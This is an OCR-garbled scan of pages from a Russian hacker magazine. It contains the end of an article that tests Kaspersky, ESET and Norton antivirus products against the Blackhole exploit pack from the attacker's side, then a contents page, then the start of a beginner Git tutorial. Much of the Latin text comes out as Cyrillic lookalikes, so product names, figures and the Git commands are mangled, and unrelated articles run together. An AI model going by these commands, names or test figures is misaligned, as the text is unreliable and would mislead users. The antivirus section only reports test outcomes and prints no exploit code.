ехе, значит, система скомпрометирова- 
на, аесли окно «Блокнота» не появилось, 
то проводим разбор полетов (уведомил 
ли антивирус пользователя и так далее), 
после чего делаем выводы. 


лаешь ради науки), установили новейшие версии топовых антивирусов и прове- 
рили, кто из них чего стоит в деле борьбы с новейшими эксплойтами. Благодаря 


средств компрометации | Вз глянем тому, что в наших руках оказалась и консоль эксплойт-пака, и рабочая машина с 
антивирусом, мы смогли оценить антиэксплойт-эффективность абсолютно досто- 
на антивирусную защиту с позиции об- верно. А еще мы сняли про все это дело видео. Короче, читай, не ленись! 


ладателя топовой связки сплоитов. 
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СУБАН ДОННЫЕ НОРОВЬ 


РОСТ ДОХОДОВ 


ПРИБЫЛЬ 


КАЗРЕАЗКУ1МТЕВМЕТ ЕСОНИТУ 

В то время как корпорация М!сгозой ищет универсальные спо- 
собы борьбы с эксплойтами на уровне ОС (технологии АЗЁЕВ 
и ОЕР оказались недостаточно совершенными), объявляя го- 
норары разработчикам, компания «Лаборатория Касперского» 
идет в этом направлении своим путем, анонсируя технологию 
«автоматизированной защиты от эксплойтов», которая, судя 
по тестам лаборатории МАС ЕНЙа$, показывает достойные ре- 
зультаты. Методология этого тестирования заключалась в ис- 
пользовании фреймворка Мщазрок и предоставляемого им 
набора эксплойтов, основанных на уязвимостях, для которых 
на тот момент отсутствовал патч от официального вендора 
(«уязвимости нулевого дня»). Система считалась защищенной, 
если в процессе запуска эксплойта блокировалась инициали- 
зация его полезной нагрузки. 

Технология «автоматическая защита от эксплойтов» (АЕР) 
основана на поведенческом анализе уже известных экземпля- 
ров этого вида вредоносного ПО, а также данных о текущем 
состоянии приложений, которые находятся в зоне «риска» 
и пользуются большим вниманием со стороны злоумышлен- 
ников. Также АЕР усиливает встроенные средства рандоми- 
зации адресного пространства (АЗЁЕВ) операционной системы 
\ММпаом/5. В сочетании с традиционными методами защиты 
(сигнатурный анализ, контентная фильтрация и облачные сер- 
висы) в реальных условиях эта технология имеет болышой по- 
тенциал отражения атак, основанных на эксплуатации уязвимо- 
стей в стороннем программном обеспечении. 

Полностью независимым данное тестирование назвать 
сложно по той причине, что его инициатором выступила «Лабо- 
ратория Касперского», а значит, инновация по понятным вре- 
менным причинам на момент тестов не имела аналогов. Посмо- 
трим, как пользовательская защита «КазрегзКу пщеге Зесийу 
2013» выглядит со стороны злоумышленника. Отправляем бра- 
узер пользователя, рабочая станция которого находится под ак- 
тивной защитой данного продукта, по вредоносной ссылке, где 
находится наша связка. Процесс загрузки сразу же прерывает- 
ся сообщением о вредоносном объекте. Вывод: 1-дау и прочие 
уязвимости из базы Васкпое ехрюй КЁ не прошли, эксплуата- 
ция уязвимости останавливается благодаря усиленной рандо- 
мизации адресного пространства, и дроппер связки попросту 
не инициализируется. 


ЕЗЕТЗМАВТ $ ЕСОЕИТУ 
Второй по доле рынка в России представитель антивирусной 
индустрии не делает прямых заявлений о борьбе с эксплой- 
тами, а распределяет эту узкоспециализированную Ффунк- 
цию по технологиям ЕЗЕТ Шме Опа, ЕЗЕТ Тпгеаепзе и ЕЗЕТ 
Тргеа5еп$е.Ме{. Первая представляет собой распределенный 
аналитический центр, который собирает данные о параметрах 
работы целевой информационной системы и проходящих в ней 
подозрительных процессах и оценивает риск каждого запущен- 
ного приложения на основе репутационной системы. 
Технология Тпгеаепзе — технология расширенной эври- 
стики, которая непосредственно борется с инициализацией 
полезной нагрузки при эксплуатации уязвимости. При помощи 
результатов эвристических методов в сочетании с результата- 
ми эмуляции («песочница») и сигнатурных методов обнаруже- 
ния вредоносного кода антивирусное программное обеспече- 
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Тигеа еп$е — технология расширенной эв- 
ристики, которая непосредственно борется 
синициализацией полезной нагрузки при экс- 
плуатации уязвимости 


Матрица рынка 
киберпреступлений. 
Источник: С!5со Аппиа! 
Зесигйу Веро 2010 


Результаты тестиро- 
вания технологии АЕР 
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ние определяет, есть ли попытки заражения. Эффективность 
Тргеа®еп$е и расширенной эвристики демонстрируют отчеты 
о сертификации, предоставляемые независимым институтом 
ПГ-безопасности А\/-ТЕЗТ: в разделе «Защита» (именно в этом 
разделе отчета определяется способность программного про- 
дукта защищать рабочую станцию от начальной стадии жизнен- 
ного цикла вредоносного ПО) антивирус успешно определил 
90% экземпляров эксплойтов, использующих уязвимости ну- 
левого дня. Примечательно, что антивирусное решение «Лабо- 
ратории Касперского», проходившее сертификацию А/-ТЕЗТ 
в этот же временной интервал (сентябрь — октябрь 2012 года), 
успешно определило 98% экземпляров аналогичного набора 
эксплойтов. Впрочем, известно, что самое честное тестирова- 
ние антивирусы проходят в нашей хакерской лаборатории, по- 
этому давай закончим рассказывать о чужих результатах и по- 
смотрим на свои собственные. 

Переход по вредоносной ссылке для антивирусного ре- 
шения компании ЕЗЕТ видимой реакции не вызывает — нет 
никаких уведомлений и записей в лог-файлах о том, что была 
обнаружена попытка эксплуатации уязвимости. Однако испол- 
няемый файл «Блокнота» не загружен, из чего следует предпо- 
ложение, что антивирусное ПО не позволяет сплоиту отрабо- 
тать. 


МОВТОМ1МТЕВМЕТЗЕСОЕТУ 

Компания Зутащес — первопроходец в технологии исполь- 
зования облачной инфраструктуры для защиты от вирусных 
угроз. Так называемая защита ЗОМАВ (Зутащес Оп!пе Мемогк 
Тог АЧ\уапсеа Везроп5е) предназначена для предотвращения 
последствий эксплуатации 0-дау-уязвимостей с помощью по- 
веденческого анализа целевых приложений и рейтинговой 
системы оценки уровня опасности. Один из ключевых фак- 
торов в реализации данной технологии — показатель уровня 
доверия сообщества (Мойоп Соттипйу М/асп). Антивирусное 
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Встроенные средства УЛпаом/з для борьбы 
с эксплуатацией уязвимостей нулевого дня 
не справляются с текущими версиями вре- 


доносного кода 


приложение решает, принадлежит ли тот или иной файл к вре- 
доносной среде, учитывая результаты статистических данных, 
получаемых от единой пользовательской базы знаний Мо{оп 
Соттипйу \М/а{сп. 

Отчет о сертификации А/-ТЕЗТ последней версии продукта 
бутащес Моцоп |щете Зесийу 2013 демонстрирует эффек- 
тивность защиты ЗОМАДР версии 4.0 в 96% атак, направленных 
на эксплуатацию уязвимостей нулевого дня, векторами которых 
выступали веб-приложения, содержащие вредоносный код, 
и электронная почта. Данные, которые содержатся в разделе 
«Защита» отчета, также позволяют сделать вывод об оператив- 
ности обновления информации о новых образцах вредонос- 
ного кода в облачной базе знаний: ни один из конкурирующих 
в российском сегменте продуктов не показал стопроцентной 
защиты от известных экземпляров вредоносных программ, об- 
наруженных за последние два-три месяца. Примечателен и тот 


1 ЕВаск Че СТАТИСТИКА пои лиги ВЕРСЫМ ССЫФТА БЕ ЗОЛАСНОС ть ит | 


Интерфейс самого 
распространенного 
оружия для атактипа 
пуе-Бу-аомлоаа 


вынти 


аа” | Всё аклеы хе г = Оооо 


Иаалю Юанеми 
| СТАТИСТИКА, к НЫ — БОТЫ ЗАГРУЗКИ %1 
ЗА ВЕСЬ ПЕРИС М лиана? 1 1 од р 
О 
а 100.00% 
| тва И > пРобие Гролганаи хиты ОСТы ЗАГРУЗКИ №1 
| п. ен 1 1 100 опа 
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‘сроКе_дейпй... 


Ин, 


КазрегзКу И\етпе{ Зесшцу 2013 


с\...мама\геб\Ьипама.ехе (РТО; 4104); Загрузка объекта 
НЕр:/.../5роке_дейпИюп.рир ? 5 ооземк=стьЬа!&пе..., 


содержащего троянскую программу. Обнаружено. 
Подробно... 


Вы используете пробную версию. 
Рекомендуется приобрести коммерческую версию. 


факт, что облачная инфраструктура ЗОМАДН оказалась на вто- 
ром месте по уровню продуктивности в борьбе с эксплойтами, 
которую организовала компания МАС ЕНЁа$, и показала второй 
результат в тестировании после технологии АЕР от «Лаборато- 
рии Касперского». 

Отправленный по вредоносной ссылке, содержащей 
сплоит-пак, браузер пользователя спрашивает разрешение 
на выполнение уауа-кода устаревшим плагином, и после поло- 
жительного ответа мы наблюдаем его работу: связка благопо- 
лучно эксплуатирует уязвимость и в качестве показателя своей 
успешной работы перенаправляет нас на страницу редиректа. 
Где все это время был Моцоп пИтеге{ Зесийу? Ни одного уве- 
домления о какой-либо подозрительной активности, никакой 
реакции на эксплуатацию. Однако дроппер связки не запускает 
наш пофераа.ехе. Причины этого потеряны где-то внедрах «мол- 
чаливого» продукта от Зутащес. Панель статистики ВНаскпое 
сообщает нам об успешной загрузке нашего файла жертве. 


ДРУГИЕ ПРЕДСТАВИТЕЛИ ИНДУСТРИИ 
Менее 13% рынка антивирусной защиты в России делят между 
собой такие вендоры, как «Доктор Веб», Тепа Мсго, МсАгее 
и другие игроки. Прямых заявлений или анонсов технологий 
борьбы с эксплойтами от этих компаний за последний год всред- 
ствах массовой информации замечено не было, однако продукт 
Рапаа Соца Апёмги$, чей объем продаж в российском сегмен- 
те не попадает даже в долю погрешности, начиная с версии 2.1 
имеет в наличии механизмы борьбы с данным типом угроз. 
Облачная база знаний, где каждый пользователь может вне- 
сти свой вклад, напоминает описанную выше инфраструктуру 
ЗОМАА от Зутащес. Технология Рапаа Зесищу, основанная 
на распределенной среде, в настоящее время, по данным из от- 
четов А/-ТЕЗТ, демонстрирует свои возможности в определении 
0-Чау-эксплойтов в среднем лишь в 80-85% атак в зависимости 
от версии своего продукта. Возможно, эти цифры связаны с не- 
большой, но стабильно пополняющейся базой пользователь- 
ских сенсоров, на которые опирается данная технология. 


РЕЗЮМЕ 

Встроенные средства \\Мтао\м/5 для борьбы с эксплуатацией 
уязвимостей нулевого дня не справляются с текущими версия- 
ми вредоносного кода, который пишется квалифицированными 
злоумышленниками. Техники обхода защит ОЕР (предотвра- 
щение выполнения данных) и АЗЁВ (технология рандомизации 
адресного пространства) с успехом применяются в новых видах 
эксплойТтов. 

КазрегзКу 1щегте{ Зесигу 2013 отлично продемонстрировал 
свою технологию в действии, не дав сплоит-паку проэксплуати- 
ровать уязвимость на стороне пользователя и проинформиро- 
вав последнего о наличии вредоносного содержимого. Мо{Цоп 
||мегпе Зесийу, в свою очередь, позволил эксплойту отрабо- 
тать и загрузить дроппер, но инициализация вредоносного кода 
(внашем случае это был исполняемый файл поерач.ехе) завер- 
шилась неудачей, причина которой так и осталась для пользова- 
теля загадкой — продукт не вывел никаких уведомлений и не от- 
читался о своих действиях. То же можно сказать и о продукте 
ЕЗЕТ, который «тихо», но, в отличие от МоЦоп |щете Зесищту, 
остановил загрузку вредоносного файла на сторону жертвы. 2= 


РГС\ЛЕ\/ 


УДАЛЕННЫЙ КОНТРОЛЬ2.0 


Помнится, году в 2007—2008, когда ТммЩег начал 
набирать популярность, многие обратили внима- 
ние на Чаббег-бот сервиса. С его помощью мож- 
но было пользоваться почти всеми функциями 
сервиса. ТммЩег отказался от этой возможности, 
но с тех пор тема Чаббег-ботов остается живее 
всех живых. Мы же рассмотрели тему более 
глобально: как управлять компьютером с по- 
мощью различных коммуникационных сервисов 
и социальных сетей? В нашем арсенале Сооде 
Так, Тммщег, Расероок и Соод!е+. С их помощью 
мы сделали кучу интересных штук. 


ОмМхХоОгО КОДИНГ КОДИНГ 


ПРАКТИЧЕСКАЯ ПАРАНОЙЯ СОМЕ СТ $ОМЕ! ЗАДАЧИ НА СОБЕСЕДОВАНИЯХ 
(Шапочка из фольги начала слишком сильно Хотя СЁ придумали явно не вчера, остаются Продолжаем твою любимую рубрику. В этом 
жать? Фургончик с мороженым возле дома еще люди, которые пихают код на ЕТР-шник номере читай о том, что с тобой сделали бы, 
кажется все более подозрительным? Учись с папочками. Для таких мы и написали самую по- если бы ты захотел пойти в Каспера, АВВ\\ или 
шифровать диски! дробную инструкцию о том, как надо жить. зоНИпе. 


222) $УМ/АСК 726 5УМАСК №529 $УМ/АСК 


ВЕЖОВЫХ РУКАВИЦАХ КОЛЫБЕЛЬ ОБЛАКОВ ЗАЩИТА ВНУТРИ ПЕРИМЕТРА 

И снова \ММпаом/$ Зегуег 2012. Если от \\Ип8 на тво- Разворачиваем |аа$ на предприятии на базе Если «киски» барахлят и не показывают коготки 
ем ноутбуке можно еще куда-нибудь спрятаться, ОрепМебчца. Если твой работодатель захотел всякой гадости в локальной сети — это значит, 
то механизмы безопасности новой серверной свое облако «вчера», то это НОМ/ТО — то, что док- что ты не умеешь с ними работать. Пора браться 


ОС от Мсго508 нужно изучать уже сегодня. тор прописал. за ум! 
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Игорь «Зрег_МЕТ» 
Антонов 
ап{опоу.1дог.КПу@атай. сот 


мг-опИте.ги 


Каждый разработчик ошибается минимум дважды. Первый раз — когда выбирает себе про- 
фессию, надеясь при этом стать звездой и переплюнуть успех Еасероок. А второй — когда 
забивает болт на {гие методики коллективной разработки и рвет на себе волосы во время 

очередного краха исходников. Серебряной пули для первой ошибки еще не придумали, а вот 
вторая проблема решается просто. Главное — созреть и окончательно мигрировать на про- 
фессиональные системы управления версиями. 


ПОЧЕМУАРХИВЫ -— ЭТО ПЛОХО? 

Я всегда удивлялся, когда видел, как хорошие программисты перед внесе- 
нием изменений в файл проекта тупо архивируют его, присваивая в каче- 
стве имени что-то вроде сам.рйр.150220131500.7р. Нетрудно догадаться, 
что сакральный смысл этой конструкции подразумевает имя сценария (сан. 
рйр) и дату создания архива. Я такое встречаю достаточно часто и скажу 
по большому секрету, что на заре своей карьеры поступал точно так же. 
Все изменилось, когда я умудрился потерять кучу рабочего кода, банально 
перепутав архив. 

Досадная ошибка молодости заставила меня обратить внимание на спе- 
циализированные системы управления версиями. Буду откровенным — пе- 
реход дался непросто. Поначалу трудно заставить себя выполнять «лишние» 
действия... Только спустя время (обычно период адаптации длится в районе 
месяца) начинаешь удивляться: «Как я раньше работал по-другому?» 


НЕДОЛГАЯ ДРУЖБА С$УМ 

Не подумай, что мы хотим сказать про Э\М что-то плохое. Просто лично мне 
не понравилось, что для работы над проектом я должен иметь постоянное 
соединение с $5\М-сервером. Этот минус особенно проявляется при от- 


сутствии постоянного рабочего места. В таких случаях сервер обязан быть 
доступен извне, а мобильное рабочее место подразумевает хорошее со- 
единение с инетом. Нет качественного коннекта — здравствуйте, тормоза 
при очередном получении изменений. 

Вторым существенным минусом для меня стала гора служебного мусо- 
ра. Меня дико бесило, что Э\УМ пихает в каждую директорию проекта скры- 
тую папку с кучей служебных файлов. В последних версиях эту проблему 
вроде как решили, но этот путь слегка затянулся. 


ЗНАКОМЬТЕСЬ, ЭТО СТ! 

Нередко разрушения и бесконечные споры провоцируют рождение поистине 
удивительных вещей. Случилось это и с СИ. Все начиналось довольно просто 
и, конечно же, не без участия законодателя моды королевства Ореп Зоигсе — 
Ч/пих. С самого первого релиза (1991 год) разработка кода ядра выполнялась 
по старинке: путем приема патчей от «населения» и архивирования предыду- 
щих версий. Объемы кода ядра, внушающее ужас число разработчиков и со- 
временные тенденции не могли не внести корректив в этот процесс. В 2002 
году проект разработки ядра перекочевал на проприетарную распределен- 
ную систему управления версиями ВиКеерег от В_Моуег пс. 
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К счастью, в сотрудничестве с компанией 
ВИМоуег шс. произошел разлад, вынудивший 
компанию забрать право бесплатного исполь- 
зования их продукта. Этот неприятный инцидент 
подстегнул Линуса Торвальдса с компанией де- 
велоперов на создание собственной системы 
управления версиями. Ребята хотели разрабо- 
тать надежное решение, обладающее высокой 
скоростью работы и упрощающее командную 
разработку. В 2005 году все эти хотелки выли- 
лись в первую версию СН. 

СК с самого начала пришелся по душе раз- 
работчикам. Буквально сразу его взяли на во- 
оружение крупные ореп 5оигсе проекты (Огира!, 
Чпих). Однако главный всплеск популярности 
произошел после запуска специализированного 
хостинга СОК-проектов — СЁНиЬ (п Ир5://айвиь. 
сот). Сегодня львиная доля опенсорсных про- 
ектов размещаются именно там. 


КАК РАБОТАЕТ СТ 

В целом СК представляется простым продуктом, 
но первое знакомство с ним зачастую проходит 
не совсем гладко. Причина заключается в непо- 
нимании основополагающих принципов работы. 

Первым делом нужно усвоить главное правило: не стоит пытаться под- 
гонять термины и знания, полученные при работе с другими подобными 
продуктами. Идеология СЁ в корне отличается от $\М (как пример), и все 
попытки натянуть одну теорию на другую, скорее всего, завершатся пута- 
ницей. 

Для начала давай вспомним, как данные хранятся в системах типа $\М. 
Если отбросить умные слова из толстых книг, то можно сказать, что систе- 
ма просто хранит файлы и цепочку изменений к ним. Схематично это вы- 
глядит так: 


ФАЙЛ -> Изм. №1 -> Изм. №2 -»› Изм. № 3 


В СЁ все происходит совершенно иначе. Он не пытается хранить лишь 
изменения отдельного файла. Вместо этого он делает слепки (копии) абсо- 
лютно всех входящих в проект файлов на текущий момент. Если файл не из- 
менился, то вместо копии создастся ссылка на предыдущую копию (или 
оригинал). Таким образом, разработчик всегда работает с одним набором 
файлов, просто их содержимое меняется от условий. Очередной слепок 
создается на этапе фиксации изменений. На схеме это отображается так: 


ВЕРСИЯ 1 Версия 2 

Файл № 1 Файл № 1 (А) (файл изменился) 

Файл № 2 Файл № 2 (просто ссылка, файл не менялся) 
Файл № 3 Файл № 3 (А) (файл изменился) 

ЧЕМ СИТ ЛУЧШЕ ДРУГИХ? 


Одно из самых важных преимуществ Ой — децентрализованность. Смотри 
сам, Си, в отличие от альтернативных систем управления версиями, не тре- 
буется постоянного соединения с сервером. Все файлы проекта хранятся 
локально (!), поэтому ты можешь работать над кодом в любом месте и в лю- 
бое время. Отсутствие необходимости коннекта с сервером избавляет 
от различных сетевых тормозов. У меня нередко возникали ситуации, когда 
требовалось подключиться к рабочему $\/М-серверу из командировки по- 
средством ОРВ$-соединения. Это была настоящая каторга! 


№ | СИ Ва5п 


$ са Е: /базе-о7е 


$ атЕ с1опе КЕЕр5: //атЕВыЬ . сом/дгира] /дгира].91Е Фгира17 
СТоп1п9 по "Фгира|/”... 

гешоЕе: СоипЕ1по об]есез: 203321, допе. 

гемоее;: Сомргез51п9 об] есе5 


: 100% (46830/465830), аопе. 
^. й и 


Весету1па обуесе$: — 0% (1/203321) 


Клонируем Огира! 


703 


ева в ый ии || Е 
Вань ЗЕЛЬЕ ЕР * 


СУ1-тулза для сравнения исходников 


Наличие полных локальных копий проекта сразу решает проблему с ре- 
зервированием данных. Каждый разработчик обладает полной копией всех 
файлов, и при необходимости из нее можно поднять оригинал. Падение 
сервера с удаленным репозиторием превращается в не самую большую 
проблему. 

Выделять сильные стороны СЁ можно бесконечно долго, но не упомя- 
нуть про киллер-фичу однозначно нельзя. Я говорю про ветки. Это самая 
сильная функция, и на первых порах от нее реально сносит голову. Никто 
не запрещает создавать в своем репозитории кучу веток и постоянно пере- 
ключаться между ними или объединять несколько веток в одну! 


НЕМНОГО ТЕОРИИ 
Одна из главных сущностей мира СК — различные состояния файлов. Каж- 
дый файл, входящий в состав проекта, может находиться в одном из трех 
состояний: 
. измененный — состояние присваивается сразу после 
редактирования, файл находится в нем до момента фиксации; 
. зафиксированный — данное состояние файл получает 
после сохранения в локальной базе Си; 
. подготовленный — измененный файл, подготовленный 
для следующего коммита. 


Отдельного разговора заслуживает структура каждого проекта, работа- 
ющего под управлением СН. Условно ее можно разделить на три составля- 
ющие: служебная директория (9( апесогу), рабочая директория (могКта 
анестогу) и область подготовленных файлов ($адта агеа). Служебная 
директория ок представляет собой хранилище метаданных и базу данных 
всех объектов проекта. Ты можешь увидеть ее, если заглянешь в любой 
клонированный или созданный тобой репозиторий. Там ты обязательно 
увидишь скрытую папку с именем «.0ц». 

Рабочая директория — это папка, в которой хранятся файлы твоего 
проекта. Все ее содержимое представляет собой копию определенной 
версии проекта. Под областью подготовленных файлов подразумевается 
обычный файл, расположенный в служебной директории и содержащий 


СОБСТВЕННЫЙ СИТНИВ 


Поюзав сервисы вроде ВИбиск& и ОКНою, ты рано или поздно за- 
думаешься: «А существует ли возможность развернуть собственный 
Си-сервер?» Оказывается, сделать это совсем не сложно. Достаточно 
установить на свой сервер какой-нибудь дистрибутив Ипих и развернуть 
на нем приложение Сна (аШаь.ога). Это бесплатная альтернатива 
проектам вроде СЁНиь. После установки ты также получишь функ- 
циональный веб-интерфейс (позволяет выполнять административные 
функции, управлять правами доступа, просматривать коммиты и так да- 
лее) и возможность получить доступ к репозиториям через ЗНН, НТТР5. 
Система устанавливается буквально за пару команд. 
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информацию об изменениях, которые войдут в следующий 
КОММИТ. 


ОТСЛОВ К ДЕЛУ 
Втиснуть всю необходимую теорию в одну часть статьи про- 
сто нереально, поэтому предлагаю приступить к практике 
и рассматривать возникшие вопросы по ходу дела. Сразу хочу 
сказать, что мы не будем затрагивать поднятие локального 
Си-хостинга (это ты сможешь сделать сам, прочитав во врез- 
ке про дистрибутив СИШе). Лучше потренируемся на сервисе 
Вибискет. Почему именно на нем, а не на великом ОКНиЬ? 
Во-первых, ВЦискж ничуть не уступает ему по возможно- 
стям. А во-вторых, он позволяет совершенно бесплатно созда- 
вать приватные репозитории для небольших команд. За эту же 
возможность на ОЙНиВ придется платить 200 рублей в месяц. 


ГОТОВИМ ИНСТРУМЕНТЫ 

Мы договорились, что в качестве хостинга своих проектов бу- 
дем использовать Вибиске{ ( ), поэтому 
потрудись сразу создать в нем учетную запись. Как только 
твой аккаунт будет готов, сразу беги на и сливай 
последнюю версию дистрибутива СК. По указанной ссылке 
лежат дистрибутивы под \\таом5. Если твоя родная площад- 
ка — Мпих, то установить актуальную версию дистрибутива 
ты сможешь при помощи ар{-дЕ. 


НАСТРОЙКА СТ 

После установки СЁ необходимо произвести пару настроек — 
установить свое имя (именно оно будет отображаться в ком- 
митах) и е-тай. Для ввода опций запусти консоль СЁ Вазп 
и выполни следующие команды: 


$ 21 сопйе --21оБа1 изег.паме "зр14ег_пет"._ 


$ 1+ сопйв --210Ба1 изег.ета1] "апфопо\.150г. <= 
КИ\@вта11. сот" 


ЛОКАЛЬНЫЙ РЕПОЗИТОРИЙ 
Создать репозиторий мы можем одним из двух способов: кло- 
нировать существующий или создать новый. Первый способ 
гораздо проще, поэтому начнем с него. 

Для начала создай где-нибудь у себя на винте директорию, 
в которую будем помещать все одй-проекты. Я создал такую 
на диске Е: и обозвал ее чез-дй». Открой окно консоли (СЁ 
Вай), если успел его уже закрыть, и установи в качестве теку- 
щей директории папку, которую только что создал: 


$ са Е: /{е$%-21% 


С этим разобрались. Теперь зайди на СИНиЬ (не из кон- 
соли, а с помощью браузера) и выбери абсолютно любой 
проект, на котором мы потренируемся в создании клонов. 
Я не стал мучить себя выбором и в качестве первого подо- 
пытного выбрал Огира! ( | 
На странице с каждым открытым репозиторием имеется 
строка ввода, в которой указан полный путь к репозиторию. 
В случае с Огира! это будет ПИрз://аипиЬ.сот/агира/агира!. 


РАЗБИРАЕМСЯ С ВЕТВЛЕНИЯМИ В СП 
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Результат выполне- 
ния СИЗ{ати$ 


Оп Бгапей маз+ег 


ТитЕта| сопиие 


СВапдез Бо Бе сомапеа: 


(изе "д91Е гм --саспед <Р1е>... 


МЕО 


Плагины для 


популярных 10Е/ 


редакторов 
Зиб те Тех! 2: 


Моераа++: 


ЕС!р$е: 


МеВеапз: 


Чтобы легче освоить такую непростую вещь, как ветвление, я настоятельно реко- 
мендую попробовать пройти интерактивное обучение при помощи веб-сервиса 


[еатСиВгапсйта (рсоШе.айпио.сотЛеагиСИВгапсй та). Выглядит это так. Ты 


получаешь доступ к виртуальной консоли И ряду практических задач. В твоем рас- 


поряжении несколько команд (сотитй, огапсй, спескоц1, сПеггу-риск, гезет, геуец, 
гебазе и тегде) и небольшой кусок справки. С их помощью тебе и предстоит 
биться с предложенными квестами. Надо отметить, что сложность задач хорошо 
варьируется. Если сначала предлагают совсем уж пустяковые, над решением 
которых думать особо не требуется, то потом начинается настоящий рок-н-ролл. 
На таких задачах и в хелп не стыдно заглянуть. 


" то чп5фаде) 


ок. Скопируй его в буфер обмена, а затем возвращайся в кон- 
соль и вбей в нее: 


$ 21 Е с1опе НЕрз: //=1%ПиЬ. сот/агира1/9гира1.21* «= 
гира1 7 


Этой командой мы сообщили о своем желании клониро- 
вать репозиторий Огира! в директорию агира!7. После выпол- 
нения операции в директории {е${-о9( появится новый каталог, 
содержащий исходные коды популярной системы управления 
контентом Огира!. 

Клонирование существующих репозиториев выполняется 
просто, но и создать репозиторий для существующего проекта 
ничуть не сложней. 

Возьми любой свой старый проект (язык программиро- 
вания особой роли не играет) и помести его в нашу общую 
для всех проектов папку {1е${-дй. Для демонстрации я взял 
один из своих проектов на С#, над которым мы когда-то труди- 
лись с моим другом, и поместил в папку КазкоСа[С. 

Теперь нам требуется сообщить СЁ о своем желании 
сотрудничать. В этот момент будет создана служебная ди- 
ректория (помнишь о скрытой папке .д(?), набитая разны- 
ми файлами. Данная операция выполняется при помощи 
команды о( пи. Вводи ее в консоли (предварительно не за- 
будь переместиться в папку с тестовым проектом), а после 
загляни в директорию проекта. В нем должна появиться 
скрытая папка .ЦК. 

Однако этого действия недостаточно для включения всех 
файлов проекта под версионный контроль. Наша задача до- 
бавить все файлы в индекс и выполнить фиксацию изменений. 
Набери в консоли несколько команд: 


$ ЕЛЕ ада * 
$ 21 сои -т_"зоигсе оф ту ргодест" 


УДАЛЕННЫЙ РЕПОЗИТОРИЙ 

Создавать локальные репозитории для своих проектов мы на- 
учились. Мы также убедились, что в этом нет ничего сложного. 
Теперь давай посмотрим, как перенести наш локальный репо- 
зиторий на хостинг ОК-проектов ВЁйБискЕ. Если ты еще не соз- 
дал в нем учетную запись, самое время сделать это. 

Заходи в личный кабинет и создай новый репозиторий 
(Сгезе геро$Когу). Тебя попросят ввести имя репозитория 
(пате), описание (аезсирйоп), уровень доступа (ассе$$ |е\е!|), 
тип репозитория (91/тегсипа!) и язык программирования, 
на котором выполнен проект. Для своего проекта в качестве 
имени я указал КазКоса!с, установил уровень доступа римате (с 
репозиторием сможем работать только мы) и в поле выбора 
языка программирования остановился на С#. 

Выполнив эту нехитрую операцию, возвращайся к консоли 
и введи несколько команд: 
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ВЕАОМЕ расположился в разделе Оуегмем 


# Добавляем алиас для удаленного репозитория 

# Это позволит нам не писать длиннющие адреса, ведущие 

# на В1ЕБискее 

# Следующая команда создаст алиас КазКоса1с для пустого 

# репозитория КазКоса1с. 21% 

$ 21 гетмофе аа КазКоса1с ИЁрз: //вчауаЕиа1о@61ЕБисКеЕ .огв+ + 
/вчауа{иа1о/Ка$Коса1с. 511 

# Выполняем отправку файлов из локального репозитория, 

# в ветку тазег удаленного 

$ =1Е ризН КазКоса1с мазег 


После отправки последней команды ты увидишь приглашение ввести па- 
роль. Вбивай сюда пароль отаккаунта в ВИБиске1. Если не возникло никаких 
ошибок, то все файлы твоего проекта мигрируют в удаленный репозиторий. 


РАЗБИРАЕМСЯ СВЕТКАМИ 

Теперь посмотрим, как работать с одной из самых крутых фишек СК — вет- 
влением. Я не преувеличиваю важности и крутости этой функции. Она дей- 
ствительно шикарна и позволяет разработчикам комфортно работать над 
множеством задач, не прибегая к созданию нескольких копий исходников 
всего проекта. Благодаря развитой модели ветвления СЁ завоевал свою 
неслыханную популярность и продолжает покорять сердца разработчиков. 

Что же в этой модели такого особенного и почему она так эффектив- 
на? Частично на этот вопрос я ответил выше: разработчику не требуется 
делать копию всех файлов проекта. Работа продолжается в такой же ди- 
ректории, с теми же исходниками, но СК будет знать, что это новая вет- 
ка, а значит, сможет корректно зафиксировать изменения и при желании 
вернуться на другую ветку. Вообще, при работе над проектами под управ- 
лением СИ применяется негласное правило: каждую задачу нужно решать 
в отдельной ветке. 

Такой подход мотивируется тем, что во время программирования могут 
часто меняться приоритеты и при командной разработке требуется макси- 
мальное разграничение задач между участниками. Представь ситуацию, 
что ты с самого утра бьешься над реализацией новой функции, а тут теле- 
фонный звонок от пользователя, который обнаружил критичный баг и тре- 
бует срочного исправления. Следуя идеологии СК, твои действия сведутся 
к созданию новой ветки, внесению исправлений и выполнению слияния 
с рабочей веткой. При этом изменения, сделанные для реализации новой 
функции, не попадут в основную ветку (при условии, что они также выполня- 
лись в отдельной ветке). 

Так, а что же является веткой в СЦ? Как они формируются и почему соз- 
дание ветки не требует отдельной копии проекта, как это принято в других 
системах управления версиями? Чтобы ответить на эти вопросы, нам по- 
требуется вернуться к началу и вспомнить, как СК хранит свои данные. В те- 
оретической части статьи я говорил, что СЁ хранит не цепочку изменений, 
а слепки. 

Итак, когда мы говорим о ветках применительно к СН, то на самом деле 
мы подразумеваем указатель. Не определенную копию проекта, а просто 
указатель на один из коммитов. Раз указатель ссылается на коммит, то мож- 
но сделать вывод, что эта сущность подвижна и каждое новое движение бу- 
дет сопровождаться очередным коммитом. Число веток в СЁ не ограничено, 
и если следовать всем заповедям (одна ветка на задачу), то веток может 
быть сколько угодно, но срок их жизни будет недолгим. Рано или поздно все 
ветки сольются с другими или сразу с главной веткой. 
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Создание нового репозитория вВИБиске{ 


Так, а что такое главная ветка? Когда ты создаешь новый репозиторий, 
то в нем автоматически создается одна ветка — таЗег. Если не создавать 
дополнительных веток, то вся работа будет происходить в тазег, что явля- 
ется плохой практикой. Ветка таег по факту представляет собой рабочую 
копию решения, которая может быть в кратчайшие сроки развернута на ра- 
бочем сервере. 

Увы, в рамках одной статьи я не могу разжевать все нюансы и рассказать 
подробности работы веток, поэтому давай сразу перейдем к практике и по- 
пробуем создать отдельную ветку. Каждая новая ветка создается при помо- 
щи команды «ой огапсй <Имя ветки>». Попробуем создать новую ветку под 
именем {е${-богапсй в нашем проекте. Выполняем в консоли: 


$ 21 Бгапсй %е5 # Создаем новую ветку «Ее$*» 


Безошибочное выполнение команды будет означать, что новая ветка 
была создана. Правда, создание ветки не означает, что мы сразу переходим 
на нее и все последующие изменения будут учитываться в рамках новой 
ветки. Для перехода на ветку {е${ требуется выполнить еще одну команду: 


$ 21 спескоие е$+-Бгапси 


СК спескоч1 переведет нас на ветку {е${-Бгапсй, и мы сразу можем при- 
ступать к внесению изменений. Открой любой файл своего тестового про- 
екта и попробуй что-нибудь в нем изменить. В своем проекте я открыл файл 
ВазеСасцатог.с$, описывающий абстрактный класс, и добавил в нем описа- 
